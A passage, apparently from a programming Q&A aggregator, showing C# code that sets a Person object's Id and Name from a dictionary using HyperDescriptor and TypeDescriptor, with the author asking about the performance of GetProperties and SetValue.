Hyper.ComponentModel; namespace Test { class Person { public int Id { get; set; } public string Name { get; set; } } class Program { static void Main() { HyperTypeDescriptionProvider.Add(typeof(Person)); var properties = new Dictionary<string, object> { { "Id", 10 }, { "Name", "Fred Flintstone" } }; Person person = new Person(); DynamicUpdate(person, properties); Console.WriteLine("Id: {0}; Name: {1}", person.Id, person.Name); Console.ReadKey(); } public static void DynamicUpdate<T>(T entity, Dictionary<string, object> properties) { foreach (PropertyDescriptor propertyDescriptor in TypeDescriptor.GetProperties(typeof(T))) if (properties.ContainsKey(propertyDescriptor.Name)) propertyDescriptor.SetValue(entity, properties[propertyDescriptor.Name]); } } } Any comments on performance considerations for both TypeDescriptor.GetProperties() & PropertyDescriptor.SetValue() are welcome...

    Read the article

< Previous Page | 293 294 295 296 297 298 299 300 301 302 303 304  | Next Page >